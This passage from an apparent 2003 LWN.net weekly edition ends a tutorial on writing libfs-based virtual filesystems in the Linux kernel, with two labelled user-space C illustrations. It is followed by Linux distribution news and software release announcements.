- The i_fop field is set up with our file operations which will actually implement reads and writes on the counter.
- We use the u.generic_ip pointer in the inode to stash aside a pointer to the atomic_t counter associated with this file.
In other words, i_fop defines the behavior of this particular file, and u.generic_ip is the file-specific data. All virtual filesystems of interest will make use of these two fields to set up the required behavior.
The last step in creating a file is to add it to the dentry cache:
    d_add(dentry, inode);
    return dentry;
Putting the inode into the dentry cache allows the VFS to find the file without having to consult our filesystem's directory operations. And that, in turn, means our filesystem does not need to have any directory operations of interest. The entire structure of our virtual filesystem lives in the kernel's cache structure, so our module need not remember the structure of the filesystem it has set up, and it need not implement a lookup operation. Needless to say, that makes life easier.
Inode creation
Before we get into the actual implementation of the counters, it's time to look at lfs_make_inode(). The function is pure boilerplate; it looks like:
static struct inode *lfs_make_inode(struct super_block *sb, int mode)
{
    struct inode *ret = new_inode(sb);

    if (ret) {
        ret->i_mode = mode;
        ret->i_uid = ret->i_gid = 0;
        ret->i_blksize = PAGE_CACHE_SIZE;
        ret->i_blocks = 0;
        ret->i_atime = ret->i_mtime = ret->i_ctime = CURRENT_TIME;
    }
    return ret;
}
It simply allocates a new inode structure, and fills it in with values that make sense for a virtual file. The assignment of mode is of interest; the resulting inode will be a regular file or a directory (or something else) depending on how mode was passed in.
Implementing file operations
Up to this point, we have seen very little that actually makes the counter files work; it's all been VFS boilerplate so that we have a little filesystem to put those counters into. Now the time has come to see how the real work gets done.
The operations on the counters themselves are to be found in the file_operations structure that we associate with the counter file inodes:
static struct file_operations lfs_file_ops = {
    .open  = lfs_open,
    .read  = lfs_read_file,
    .write = lfs_write_file,
};
A pointer to this structure, remember, was stored in the inode by lfs_create_file().
The simplest operation is open():
static int lfs_open(struct inode *inode, struct file *filp)
{
    filp->private_data = inode->u.generic_ip;
    return 0;
}
The only thing this function need do is copy the pointer to the atomic_t counter over into the file structure, which makes it a bit easier to get at.
The interesting work is done by the read() function, which must increment the counter and return its value to the user space program. It has the usual read() operation prototype:
static ssize_t lfs_read_file(struct file *filp, char *buf,
        size_t count, loff_t *offset)
It starts by reading and incrementing the counter:
    atomic_t *counter = (atomic_t *) filp->private_data;
    int v = atomic_read(counter);
    atomic_inc(counter);
This code has been simplified a bit; see the module source for a couple of grungy, irrelevant details. Some readers will also notice a race condition here: two processes could read the counter before either increments it; the result would be the same counter value returned twice, with certain dire results. A serious module would probably serialize access to the counter with a spinlock. But this is supposed to be a simple demonstration.
So anyway, once we have the value of the counter, we have to return it to user space. That means encoding it into character form, and figuring out where and how it fits into the user-space buffer. After all, a user-space program can seek around in our virtual file.
    len = snprintf(tmp, TMPSIZE, "%d\n", v);
    if (*offset > len)
        return 0;
    if (count > len - *offset)
        count = len - *offset;
Once we've figured out how much data we can copy back, we just do it, adjust the file offset, and we're done.
    if (copy_to_user(buf, tmp + *offset, count))
        return -EFAULT;
    *offset += count;
    return count;
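The read path above, as an added user-space model (not code from the article or from the lwnfs module): it keeps the same offset and count clamping, but fetches and increments the counter in one atomic step, and replays the interleaving in which two readers get the same value. The value of TMPSIZE, model_copy_to_user(), the negative-offset check and the handling of reads at a nonzero offset are assumptions of this example.

```c
#include <errno.h>
#include <stdatomic.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>

#define TMPSIZE 20  /* assumed scratch size; large enough for any int plus "\n" */

/* Hypothetical stand-in for copy_to_user(): returns 0 on success. */
static int model_copy_to_user(char *dst, const char *src, size_t n)
{
    memcpy(dst, src, n);
    return 0;
}

/*
 * Model of the counter read. "long long" stands in for loff_t.
 * Returns the number of bytes copied, 0 at end of file, or a negative errno.
 */
ssize_t model_read(atomic_int *counter, char *buf, size_t count,
                   long long *offset)
{
    char tmp[TMPSIZE];
    int v, len;

    if (*offset < 0)                    /* defensive: never index before tmp */
        return -EINVAL;

    if (*offset == 0)
        /* Take the value and bump the counter as one indivisible step. */
        v = atomic_fetch_add(counter, 1);
    else
        /* Continuation of an earlier read: re-render the value already
         * handed out instead of consuming a new one (model's choice). */
        v = (int)((unsigned)atomic_load(counter) - 1u);

    len = snprintf(tmp, TMPSIZE, "%d\n", v);
    if (*offset > len)                  /* seeked past the text: end of file */
        return 0;
    if (count > (size_t)(len - *offset))
        count = (size_t)(len - *offset); /* never copy beyond the text in tmp */

    if (model_copy_to_user(buf, tmp + *offset, count))
        return -EFAULT;
    *offset += (long long)count;
    return (ssize_t)count;
}

/*
 * The race replayed deterministically: both readers load the counter
 * before either increments it. Returns 1 if they saw the same value.
 */
int racy_interleaving_duplicates(void)
{
    atomic_int c;
    int a, b;

    atomic_init(&c, 0);
    a = atomic_load(&c);        /* reader A: atomic_read() */
    b = atomic_load(&c);        /* reader B: atomic_read(), A has not incremented */
    atomic_fetch_add(&c, 1);    /* reader A: atomic_inc() */
    atomic_fetch_add(&c, 1);    /* reader B: atomic_inc() */
    return a == b;
}

int main(void)
{
    atomic_int c;
    char buf[32];
    long long off = 0;
    ssize_t n;

    atomic_init(&c, 0);
    n = model_read(&c, buf, sizeof(buf), &off);
    printf("read %zd bytes: %.*s", n, (int)n, buf);
    printf("racy interleaving returns a duplicate: %d\n",
           racy_interleaving_duplicates());
    return 0;
}
```
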
Then, there is lfs_write_file(), which allows a user to set the value of one of our counters:
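static ssize_t lfs_write_file(struct file *filp, const char *buf,
        size_t count, loff_t *offset)
{
    atomic_t *counter = (atomic_t *) filp->private_data;
    char tmp[TMPSIZE];

    /* Only accept writes at the start of the file. */
    if (*offset != 0)
        return -EINVAL;
    /* Refuse input that would not fit in tmp along with a terminating NUL. */
    if (count >= TMPSIZE)
        return -EINVAL;
    /* Zero the buffer so the copied text is always NUL-terminated. */
    memset(tmp, 0, TMPSIZE);
    if (copy_from_user(tmp, buf, count))
        return -EFAULT;
    atomic_set(counter, simple_strtol(tmp, NULL, 10));
    return count;
}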
That is just about it. The module also defines lfs_create_dir, which creates a directory in the filesystem; see the full source for how that works.
A simpler way
The above example contains a great deal of scary-looking boilerplate code. That boilerplate will be necessary for many applications, but there is a shortcut that will work for many others. If you know at compile time which files you wish to create, and you do not need to make subdirectories, read on for the easier way.
In this section, we'll talk about a different version of the lwnfs module - one which eliminates about 1/3 of the code. It implements a simple array of four counters, with no subdirectories. Once again, full source is available if you are interested.
Above, we looked at a function called lfs_fill_super(), which fills in the filesystem superblock, creates the root directory, and populates it with files. In the simpler version, the entire function becomes the following:
static int lfs_fill_super(struct super_block *sb, void *data, int silent)
{
    return simple_fill_super(sb, LFS_MAGIC, OurFiles);
}
simple_fill_super() is a libfs function which does almost everything we need. Its actual prototype is:
int simple_fill_super(struct super_block *sb, int magic,
        struct tree_descr *files);
The struct super_block argument can be passed directly through, and magic is the same magic number we saw above. The files argument describes which files should be created in the filesystem; the relevant structure is defined as follows:
struct tree_descr {
    char *name;
    struct file_operations *ops;
    int mode;
};
The arguments should be fairly obvious by now; each structure gives the name of the file to be created, the file operations to associate with the file, and the protection bits for the file. There are, however, a couple of quirks about how the array of tree_descr structures should be built:
- Entries which are filled with NULLs (more strictly, where name is NULL) are simply ignored. Do not try to end the list with a NULL-filled structure, unless you like decoding oops listings.
- The list is terminated, instead, by an entry that sets name to the empty string.
- The entries correspond directly to the inode numbers which will be assigned to the resulting files. This knowledge can be used to figure out, in the file operations code, which file is being opened. But this feature also implies that the first entry in the list cannot be used, since the filesystem root directory will take inode zero. So, when you create your tree_descr list, the first entry should be NULL.
Having painfully learned all of the above, your author has set up the list for the four "counter" files as follows:
static struct tree_descr OurFiles[] = {
    { NULL, NULL, 0 },              /* Skipped */
    { .name = "counter0",           /* Inode 1 */
      .ops = &lfs_file_ops,
      .mode = S_IWUSR|S_IRUGO },
    { .name = "counter1",           /* Inode 2 */
      .ops = &lfs_file_ops,
      .mode = S_IWUSR|S_IRUGO },
    { .name = "counter2",           /* Inode 3 */
      .ops = &lfs_file_ops,
      .mode = S_IWUSR|S_IRUGO },
    { .name = "counter3",           /* Inode 4 */
      .ops = &lfs_file_ops,
      .mode = S_IWUSR|S_IRUGO },
    { "", NULL, 0 }                 /* Terminates the list */
};
Once the call to simple_fill_super() returns, the work is done and your filesystem is live. The only remaining detail might be in your open() method; if you have multiple files sharing the same file_operations structure, you will need to figure out which one is actually being acted upon. The key here is the inode number, which can be found in the i_ino field. The modified version of lfs_open() finds the right counter as follows:
static int lfs_open(struct inode *inode, struct file *filp)
{
    if (inode->i_ino > NCOUNTERS)
        return -ENODEV;  /* Should never happen. */
    filp->private_data = counters + inode->i_ino - 1;
    return 0;
}
The read() and write() functions use the private_data field, and thus need not be modified from the previous version.
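The tree_descr rules and the inode-number lookup above, as an added user-space check (not code from the article or from libfs): check_tree() walks a table by the rules the article lists, but with an explicit slot count so a table that lacks the empty-string terminator is reported instead of being walked off its end. The names tree_descr_model, check_tree(), counter_index(), the error codes and the sample tables are constructed for this example, and the lower bound in counter_index() is a defensive addition.

```c
#include <stddef.h>
#include <stdio.h>

#define NCOUNTERS 4
#define NSLOTS(t) (sizeof(t) / sizeof((t)[0]))

/* User-space mirror of the fields the article shows in struct tree_descr. */
struct tree_descr_model {
    const char *name;
    const void *ops;
    int mode;
};

enum { TD_SLOT0_USED = -1, TD_UNTERMINATED = -2 };

/*
 * Walk a table by the article's rules: a NULL name is skipped, an empty
 * name ends the list, and the slot index is the inode number. Returns the
 * number of files, or a negative TD_* code for a table that breaks a rule.
 */
int check_tree(const struct tree_descr_model *files, size_t nslots)
{
    int nfiles = 0;
    size_t i;

    for (i = 0; i < nslots; i++) {
        if (files[i].name == NULL)
            continue;                   /* ignored entry */
        if (files[i].name[0] == '\0')
            return nfiles;              /* proper terminator */
        if (i == 0)
            return TD_SLOT0_USED;       /* inode zero belongs to the root */
        nfiles++;
    }
    return TD_UNTERMINATED;             /* ran out of slots with no "" entry */
}

/* Map an inode number to an index into the counter array, or -1. */
int counter_index(unsigned long ino)
{
    if (ino < 1 || ino > NCOUNTERS)
        return -1;
    return (int)(ino - 1);
}

/* Constructed sample tables; 0644 stands in for the kernel mode macros. */
const struct tree_descr_model good_table[] = {
    { NULL, NULL, 0 },
    { "counter0", NULL, 0644 },
    { "counter1", NULL, 0644 },
    { "counter2", NULL, 0644 },
    { "counter3", NULL, 0644 },
    { "", NULL, 0 },
};

/* Ends with a NULL-filled entry, which is skipped rather than terminating. */
const struct tree_descr_model null_ended_table[] = {
    { NULL, NULL, 0 },
    { "counter0", NULL, 0644 },
    { NULL, NULL, 0 },
};

/* Puts a file in slot 0, the inode number the root directory takes. */
const struct tree_descr_model slot0_table[] = {
    { "counter0", NULL, 0644 },
    { "", NULL, 0 },
};

int main(void)
{
    printf("good: %d\n", check_tree(good_table, NSLOTS(good_table)));
    printf("NULL-ended: %d\n",
           check_tree(null_ended_table, NSLOTS(null_ended_table)));
    printf("slot 0 used: %d\n", check_tree(slot0_table, NSLOTS(slot0_table)));
    return 0;
}
```
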
Conclusion
The libfs code, as demonstrated here, is sufficient for a wide variety of driver-specific virtual filesystems. Further examples can be found in the 2.5 kernel source in a few places:
- drivers/hotplug/pci_hotplug_core.c
- drivers/usb/core/inode.c
- drivers/oprofile/oprofilefs.c
- fs/ramfs/inode.c
- fs/nfsd/nfsctl.c (simple_fill_super() example)
...and in a few other spots – grep is your friend.
Keep in mind that the 2.6 driver model code makes it easy for drivers to export information within its own virtual filesystem; for many applications, that will be the preferred way of making information available to user space. The Driver Porting Series has several articles on the driver model and sysfs. For cases where only a custom filesystem will do, however, libfs makes the task (relatively) easy.
Page editor: Jonathan Corbet
Distributions
News and Editorials
New 1.0 Releases: OpenNA Linux, Gibraltar Firewall, Devil-Linux
Three distributions have reached their 1.0 releases over the last two weeks - OpenNA Linux, Gibraltar Firewall and Devil-Linux. Despite the version number, none of these three are new projects as all of them have been in development for over a year. OpenNA Linux is a Red Hat-based secure distribution for servers, while the Debian-based Gibraltar Firewall and independently developed Devil-Linux are live firewalls running directly from bootable CDs.
OpenNA Linux 1.0
OpenNA Linux is a product of Canada's OpenNA Incorporated. It is a Linux distribution, originally based on Red Hat Linux, designed for servers and with emphasis on strong security. This is achieved by patching its Linux 2.4.22 kernel with the GRSecurity patch to protect against buffer overflow exploits, with all server services made to run in chroot jail environment mode and other security features. The installation program allows the user to choose from a selection of pre-defined server classes, depending on the server's purpose, with all unneeded services turned off by default. For those who intend to install and test drive OpenNA Linux, beware that it cannot be installed on a pre-selected partition - the OS takes over the entire first hard disk.
If you are wondering about the developers' authority on security matters, then you can rest assured that you are in the company of experts. Besides the OpenNA distribution, the company also produces an authoritative, 1200-page technical book entitled Securing & Optimizing Linux: The Hacking Solution. The book is written for system administrators and security-conscious users who wish to protect their Linux systems from unauthorized intrusions and other external attacks. All this expertise, together with a well-designed web site, makes OpenNA Linux a serious contender for those who are looking for a secure and optimized Linux distribution for their mission-critical servers. Although OpenNA Linux is available for free download, the developers would appreciate your purchase of a supported boxed edition for $47.95, with 30-day email support and documentation.
Gibraltar Firewall 1.0
Gibraltar Firewall, in development since 1999, is a product of eSYS Informationssysteme GmbH in Austria. The Debian-based firewall runs directly from a bootable CD without any need for hard disk installation. One distinguishing feature of Gibraltar from other similar products is a Webmin-like web-based configuration utility called GibADMIN. "Gibraltar can be configured using a clear and intuitive web client called GibADMIN; Linux specific know-how is no longer required.", claims the Gibraltar product overview page. The firewall comes with kernel 2.4.22, IPSec, SSL wrapper, powerful packet filtering ability based on various criteria, Postfix mail server with SpamAssassin and many other server applications.
Gibraltar Firewall comes in two editions - a full-featured commercial edition (€990) and a free edition with disabled GibADMIN (except for a 30-day trial period, license for which can be obtained separately). This won't be a problem for expert Linux users who can configure the firewall directly from the command line, or remotely via an SSH connection. A comprehensive 72-page user manual and further links to user-contributed tutorials are listed on the product documentation page, while fairly active mailing lists in English and German can provide further help, if necessary.
Devil-Linux 1.0
Devil-Linux is an independently developed Linux-based firewall on a live CD with the ability to save configuration settings on a floppy disk or a USB pen drive. It was created by Heiko Zuerker, an IT manager in North Carolina, in 2001. One interesting feature of Devil-Linux is that, besides the live CD ISO image, the developers also provide a "build system", which enables building of custom editions of Devil-Linux with extra software not included on the original CD. When the custom system is compiled and ready, it can be burned onto a bootable CD and used the same way as an unmodified Devil-Linux. The Devil-Linux documentation provides detailed information about this and other aspects of the distribution.
Unlike Gibraltar, Devil-Linux is a non-commercial project. It can be used not only as a firewall, but also as a router, gateway or a general purpose server. Based on kernel 2.4.22 with the GRSecurity patch, it includes most server software, such as BIND, DHCP, Apache, MySQL, Postfix, Samba, OpenLDAP, Squid, as well as IPSec. Two recent reviews of the product can be found at Kalamazoo LUG and NewsForge, and an older interview with Heiko Zuerker at PortaZero. Despite its lighthearted name, Devil-Linux is a serious project with strong security as its utmost priority.
Two new Debian installers
There are quite a few accolades heaped on the Debian GNU/Linux distribution, but "it has a great installer" is rarely one of them. While the current installer has its defenders, many users find it to be arcane and difficult -- particularly those who are new to Linux. The point that one only need install Debian once is well-taken, but the first attempt often befuddles new users to the point of abandoning Debian GNU/Linux before they can fully appreciate the strengths of the distribution.
Now users have not one, but two new installers to look forward to in the near future. The Debian Project has been working on a new installation system for the "Sarge" release for some time. Joey Hess announced the first beta release of the installer on November 9 and called for users to help test the beta. Ian Murdock had also announced in October that Progeny has ported Red Hat's Anaconda to Debian. Progeny has also ceased work on several projects, PGI, autoinstall, gnome-tasksel and python-parted, in favor of Anaconda for Debian.
We decided we would take a look at the new installation methods to see what the Debian community would be using in the future. We downloaded the Beta 1 installer ISO with Debian base and put it to the test by installing Sarge. The new installer still doesn't come with all the bells and whistles, or fancy GUI, but it does include a welcome feature in the form of hardware detection. This will be a relief for users who are eager to try out Debian but lack any idea about which kernel module is required for their network card, and so on.
The first stage of the installer detects hardware and attempts to configure the network settings via DHCP. Users without a DHCP server handy can manually configure their network after DHCP fails. (Assuming they have a supported Ethernet card, of course.) The user is also able to complete the first-stage install without a network connection if necessary. Next the user is prompted to use cfdisk to partition their hard disk, then the installer allows the user to configure and mount partitions. After this, the base system will be installed and the system is rebooted. Upon system boot, the user works through base-config to configure their system.
According to the HOWTO, base-config is not considered part of the installer. However, we went ahead and looked at the entire procedure required to install Debian Sarge, which includes running through base-config.
Overall, we feel that the new installation procedure promises to be an improvement. However, the user is still expected to know much more about the distribution and hardware when installing Debian Sarge than if they install Fedora, SUSE, Mandrake or even Slackware. Users are asked to make a lot of decisions during the installation, and if unfamiliar with the terminology, they will undoubtedly be intimidated.
The base-config procedure does provide detailed help text for most options, but if they are not familiar with the concepts being presented they will likely have a difficult time making the necessary decisions. Even worse, it does not provide a way to go back and change options during configuration. For example, if a user forgets the distinction between the various Exim configuration options, they cannot cycle back to re-read the descriptions of Exim's default configurations.
Though Progeny's installer has not been publicly released yet, we contacted Ian Murdock of Progeny and received a current snapshot of their work with Anaconda as a Debian installer.
It is, to say the least, not quite ready for prime-time. Some of the features have not yet been implemented or do not work, including Ethernet card configuration and adding regular users. However, the pre-release we were given was enough to get the general feel for the installer. While the graphics have been changed, using Progeny's Anaconda for Debian is very much like installing Red Hat Linux 9 or Fedora. The GUI procedure is very simple and straightforward, and doesn't require much knowledge on the part of the user doing the install.
As exciting as Anaconda for Debian may be to some, Murdock's announcement of Progeny's port of Anaconda produced some friction on the debian-devel mailing list. Many on the list were concerned that Anaconda would detract from debian-installer work and delay the release of Sarge, or serve as a waste of resources when Progeny could have been working on debian-installer.
Murdock replied that it was not Progeny's intent to detract from work being done by the Debian Project:
Debian-installer is definitely an improvement, and it looks to be very stable. The entire Debian installation routine, including base-config, needs some work before it will be ready for less experienced Linux users. Progeny's Anaconda, once it is finished, looks as if it will be an attractive alternative for those who would like to run Debian on x86 systems, but lack the chops to get past a non-GUI installation that requires a great deal of knowledge about their system and Linux.
Distribution News
Debian GNU/Linux
The Debian Weekly News for November 11, 2003 covers the latest Netcraft report (Apache gains ground); Exec-Shield for Debian?; a clarification of DFSG Clause 1; and much more.
The first beta release of the new debian-installer has been announced. Interested people are encouraged to try it out and help the developers find the remaining problems.
Debian has won several of the Linux Journal 2003 Readers' Choice awards, including "Favorite Distribution" and "Best Enterprise Distribution". Debian and Debian-based Knoppix received more than 60% of the votes.
The second revision of the current stable Debian distribution (woody) will probably be released soon. People are encouraged to check it out and make comments.
Gentoo Weekly Newsletter - Volume 2, Issue 45
The Gentoo Weekly Newsletter for the week of November 10, 2003 is now available, with a summary of the Gentoo Managers' Meeting, and more.
Xandros Desktop 2.0 announced
Xandros has announced the forthcoming release of its Xandros Desktop 2.0. "With a strong user focus, Xandros Desktop 2.0 offers an intuitive, elegant, graphical environment that's easy to use, and installs with 4 clicks of a mouse." This distribution, which Xandros claims to be built on "Debian Linux 4.0", will be available on December 9.
New Distributions
BLAG Linux and GNU
From the announcement: "BLAG Linux And GNU by the Brixton Linux Action Group is an operating system. It comes with everything you need to get a computer up and running--it needs no other software. It has Internet, graphics, video, sound, office, security, file sharing, and more applications. It's fast, reliable, runs on older machines, and flies on fast boxes. You can install miniblag (the smallest install at less than 350 Megs), deskblag (includes a Gnome desktop with all the typical apps), serverblag (all the server daemons but no GUI) or get it all with blagblagblag." BLAG9000 is the current version.
Linux LiveCD Router
Linux LiveCD Router version 1.5 has been released under the GNU GPL. Linux LiveCD is a small and simple LiveCD distribution aimed at broadband and wifi users. No installation or hard disk required.
PLD Live CD
PLD Live CD is a bootable CD that contains a live Linux distribution based on the PLD Linux distribution. It uses squashfs transparent compression to fit a huge number of packages on a single CD, including OpenOffice, KDE, Gnome, WindowMaker, XFCE, and many more. It also includes a set of scripts for detecting hardware such as SCSI and ISA devices, monitors, sound cards, and graphic cards. It also supports 'profiles' that let you store your settings on a floppy. PLD Live CD is currently at version 0.26.
Minor distribution updates
Beyond Linux From Scratch
Beyond Linux From Scratch (BLFS) has released v5.0 with major feature enhancements. "Changes: This is the first concurrent release with LFS-5.0. It features XFre86-4.3.0.1, KDE 3.1.4, GNOME 2.2.2, Apache 2.0.47, and OpenOffice 1.1.0 plus a wide variety of current libraries and support programs. The book's layout has also been improved from the previous release."
KNOPPIX
KNOPPIX has released v3.3-2003-11-03 with minor feature enhancements. "Changes: This version features a new background picture, the usual lot of updates, OpenOffice 1.1 (English and German), and KDE 3.1.4 (partly, some packages are still missing). It removes compressed changelogs for space reasons."
Onebase Linux
Onebase Linux version 2.0 has been announced. "OL has achieved a major breakthrough with version 2.0. This progress is result of the completely rewritten and new OLM framework. Not only the package management has become more powerful and flexible in this version but also it now makes Onebase both a source and/or binary distribution."
Pingwinek GNU/Linux
Pingwinek GNU/Linux has released v1.0rc0 with major feature enhancements. "Changes: A new installation process was implemented. The Live CD version now automatically detects hardware. GNOME 2.4 and the 2.6 Linux kernel are now used, and new software was included."
Sentinix
Sentinix has released v1.0 rc 01, the first beta release for this distribution, formerly known as Compledge Sentinel.
Sentry Firewall
Sentry Firewall has released v1.5.0-rc6 with minor bugfixes. "Changes: snort, squid, Webmin, and dnsmasq were updated. The USB support in the kernel was also enhanced. The HOWTO was updated and a new documentation and reference guide were created to cover all other documentation not covered in the HOWTO."
TopologiLinux
TopologiLinux has released v4.0.0 with major feature enhancements. "Changes: This version is based on Slackware 9.1 and can be booted from your existing Windows boot manager."
TrinityOS
TrinityOS has released v11/08/03 with minor feature enhancements. "Changes: Various daemon versions were updated in the URL section. The thoughts about Redhat, Fedora, and SuSe in the distros section were updated. A Bash OCTAL math issue in the UPS graphing script was fixed."
Distribution reviews
Fedora at a Glance (Linux Journal)
Linux Journal takes a look at the Fedora Core 1 release. "In summary, there are some promising new features in Fedora and it is reassuring to see it has the stability and slick interface we've come to expect from Red Hat, but it is not quite as polished as some of the recent Red Hat releases. If you know Linux already and don't mind installing some extra packages and changing some settings, then it's for you. If you are new to Linux or want it to all work perfectly "out-of-the-box" with an automatic package resolver, you might be better off to wait for the next Fedora release."
Fedora Core 1 Review (LinuxElectrons)
LinuxElectrons reviews the Fedora Core 1 release. "The Linux community will benefit tremendously from Fedora. With RedHat's expertise and knowledge combined with a strong community we should expect nothing less than a high performance desktop. So far, this has been the case. IMHO, this is the perfect strategy for RedHat. They have been battling two extremes, the corporate server market versus the bleeding edge desktop users at retail. These two camps are at odds with one another, corporate wanting slow gradual changes and retail wanting the bleeding edge feature set. Fedora is the ultimate compromise and one community in which I'm a willing participant."
Page editor: Rebecca Sobol
Development
Updates to the File Hierarchy Standard
A new revision of the Filesystem Hierarchy Standard (FHS) (PDF) has been published by the Filesystem Hierarchy Group.
Through its history, those who built the various flavors of Unix have placed standard files in varying, system-specific locations. To a lesser degree, the same problem has also occurred with the numerous Linux distributions. Adherence to the FHS by Linux distribution architects has made life much easier for system administrators, end users, and software developers.
The FHS categorizes files by two attributes: shareable/unshareable and static/variable. Standard directories are then categorized according to the attributes of the files within. In traditional UNIX implementations, directories often contained files and subdirectories with all of these attribute combinations. By strictly grouping the directory contents according to attributes, the sharing of common directories between systems, and the protection of site-specific data, is simplified.
This version of the standard proposes the creation of two new top-level directories, /srv and /media. The proposal for /srv defines the top-level directory as being used for data generated by users for the services the system offers. This would include, for example, ftp, www, and CVS repositories.
The /media proposal suggests the creation of a top-level directory which contains mount points for removable media such as:
/media/cdrom
/media/cdrecorder
/media/floppy
/media/zip
The commonly used directory /mnt would then be restricted to use by the systems administrator for temporary mount points.
While the hammering out of such standards is likely to cause a lot of lively discussion, the benefits of filesystem standardization by the majority of Linux distributions are indeed great.
System Applications
Audio Projects
Speex 1.1.2 Released
Version 1.1.2 of Speex, an audio CODEC that's designed for speech, has been released. "This new unstable release improves on the fixed-point port started in 1.1.1. The port is not yet complete, but many modes are now usable in real-time on ARM processors."
Database Software
Firebird V1.5 RC7 builds are available
Version 1.5 RC7 of the Firebird database is available. "The development of Firebird 1.5 release is in final development stage! The Release Candidate means that we're "almost there", and we turned our focus to remaining known issues and rough edges, final testing and bug squashing. We made a lot of progress with it thanks to your feedback. The seventh Release Candidate should become the final release, so we are eager to hear about your experience (good or bad) with it."
PostgreSQL v7.4 RC2 is available
Version 7.4 RC2 of the PostgreSQL database is available. "As we are in the home stretch of a full release, we encourage as many as possible to test and report any bugs they can find, whether as part of the build process, or running in "real life" scenarios."
PostgreSQL Weekly News
The November 7, 2003 edition of the PostgreSQL Weekly News has been published. Take a look at the latest PostgreSQL database news and discussions.
Filesystem Utilities
ntfsprogs 1.8.0beta2 released (SourceForge)
Version 1.8.0beta2 of ntfsprogs, a set of utilities for ntfs filesystems, is available. "Changes in this release: Merge ntfs gnomevfs module by Jan Kratochvil. The Gnome virtual filesystem provides universal access to different filesystems. This module enables Gnome VFS clients to seamlessly utilize the NTFS library."
Mail Software
Macho 0.4 released
Version 0.4 of Macho, a Common Lisp-based email web archiving system, is out. "This version provides several additions including message navigation hotkeys, per-archive custom style sheets, a thread context view, and more."
Peer to Peer
JXTA 2: A high-performance, massively scalable P2P network (IBM developerWorks)
Sing Li looks at JXTA 2 on IBM's developerWorks. "JXTA 2 is the second major release of the open source P2P network building substrate with a popular Java-based reference implementation. Significant design modifications have been introduced to create higher performance, massively scalable, and maintainable P2P networks. This article, which builds on Sing Li's JXTA series Making P2P interoperable, published two years ago, brings you up to date on the platform's major changes."
Printing
CUPS 1.1.20rc6 released
Version 1.1.20rc6 of CUPS, the Common Unix Print System, has been released. "CUPS 1.1.20 is primarily a bug fix and performance tuning release and includes fixes for 64-bit platforms, deadlock problems in the signal handling code, PDF printing issues, web interface issues, and various operating system-specific issues. The new release also adds new CUPS API functions for reading and writing files via HTTP, performing authentication, and controlling the required PPD conformance level."
Printing for the Impatient (O'ReillyNet)
Michael Lucas covers various Unix/Linux printing issues on O'Reilly. "Printing on a UNIX-like operating system has traditionally given headaches to even experienced sysadmins. The FreeBSD Handbook has a big section on how printers work, and it's well worth reading if you want to become intimate with the innards of printing. Personally, I don't want to struggle with identifying file types, input filters, and output filters; I want to plug in a printer and have the Magical Printer Pixies do all the work for me."
Web Site Development
AOLserver 4.0 GM released (SourceForge)
Version 4.0 GM of AOLserver has been announced. "AOLserver is a multithreaded, Tcl-enabled, massively-scalable and extensible web server tuned for large scale, dynamic web sites. AOLserver also includes complete database integration and a dynamic page scripting language."
Gallery v1.4.1 RC3 available (SourceForge)
Version 1.4.1 RC3 of Gallery, a web-based photo album management system, has been released. "New features for this 1.4.1 include voting/ranking of images, user self-registration, lost password reset, e-mail notifications, support for "skins" to customize Gallery's look and feel, a clearer and easier to follow Config. Wizard and tons of other small improvements and bugfixes."
Release of ht://Dig 3.2.0b5 (SourceForge)
Version 3.2.0b5 of ht://Dig, a web site search engine, has been announced. "After being asked "Is ht://Dig dead?" once too often, the ht://Dig group is very happy to announce the release of ht://Dig version 3.2.0b5. This fourth beta release of 3.2 (yes, 3.2.0b4 was cancelled) should fix all bugs in previous 3.2 releases and introduces a few new features. As a beta release, it has not received exhaustive testing. However, we believe it to be almost stable enough for production use, and hope that you consider giving it a try to provide feedback."
Mambo Open Source 4.5 Beta 1.0.3 Released (SourceForge)
Version 4.5 Beta 1.0.3 of Mambo Open Source, a dynamic web content management system, is available. The project's home page says: "In Mambo Open Source 4.5 Beta 1.0.3 we decided to start implementing Search Engine Friendly URL's (SEF). We did some initial work and now will need your help with testing and finding bugs."
more.groupware 0.7.0 released (SourceForge)
Version 0.7.0 of more.groupware, a PHP4-based web groupware suite, is out. "It fixes the webmail2 setup bug as well as a few other bugs in forum, files, tts. Additionally some new features have been added to calendar2 and webmail2 and some translation updates have been done."
Quixote 0.7a2 available
Version 0.7a2 of the Quixote web application framework is available. See the CHANGES file for information on what's new.
Araneida 0.80 released
Version 0.80 of Araneida, a Common Lisp-based extensible web server, is available. "This version provides a new HTTP-LISTENER abstraction, cleaner raising of HTTP errors, support for the REFRESH header and a few fixes."
Using Common Lisp to Build Web Applications
Lisp aficionado Paolo Amoroso has passed us links to a couple of new articles concerning the KPAX web application system.
Miscellaneous
Linux-VServer 1.0 released
Version 1.0 of Linux-VServer is available. "VServer is a very cool project, a bit like UML but with a much better architecture for shared hosting environments. It was originally written by Jack Gelinas (of Linuxconf fame) and is now maintained by Herbert Pötzl."
Desktop Applications
Audio Applications
GNUsound 0.6.1 has been released
Version 0.6.1 of GNUsound, a sound editor, is available. "This is a maintenance release to fix a few critical bugs. I really wanted to skip this release and go straight for 0.7, but there's too much work to be done on that version still, and the 0.6 bugs are quite serious."
Rhythmbox 0.6.0: 'The Universe Is Finite' (GnomeDesktop)
Version 0.6.0 of Rhythmbox, an integrated music management application for GNOME, has been released. "The release name signifies the fact that there is actually in theory still a limit to the amount of music you can put in Rhythmbox's library, since you are bounded by the universe's finite size."
WaveSurfer 1.5.6 released
Version 1.5.6 of the WaveSurfer audio editing utility is available. See the Change History file for details.
Desktop Environments
CVSGnome 0.4.8 released (GnomeDesktop)
Version 0.4.8 of CVSGnome, a CVS build script for GNOME, is available. "Using this software, you can easily build GNOME either from tarballs or CVS HEAD. In addition, it features all major extra software available for GNOME, including the GIMP, Gnumeric, and many more."
KDE Traffic
Issue #67 of KDE Traffic is out. The KDE.News summary says: "with news regarding KMail, Kontact, general look and feel and more."
KDE-CVS-Digest
November 7, 2003 KDE-CVS-Digest is online. Here's the summary: "Bug fixes and more bug fixes. Umbrello, KDevelop, Quanta, Konsole, KOrganizer encoding, KSpread, Khtml, Juk, Kopete, Kgpg, KWin and kdeui all have a large number of bugs fixed. There were a few announcements this week. Of course the big one is the release of 3.2 beta1."
KDE Developer's Corner: Using KConfig XT
A new tutorial on KConfig XT has been announced. "As some of you may know, KDE 3.2 will introduce a heavily improved configuration framework, known as KConfig XT. This new framework extends, not deprecates our current configuration API. To help developers understand KConfig XT I have created a short tutorial (ps, kwd) available on developer.kde.org." The tutorial is available here.
PyKDE API Forges Ahead with Plugin Support (KDE.News)
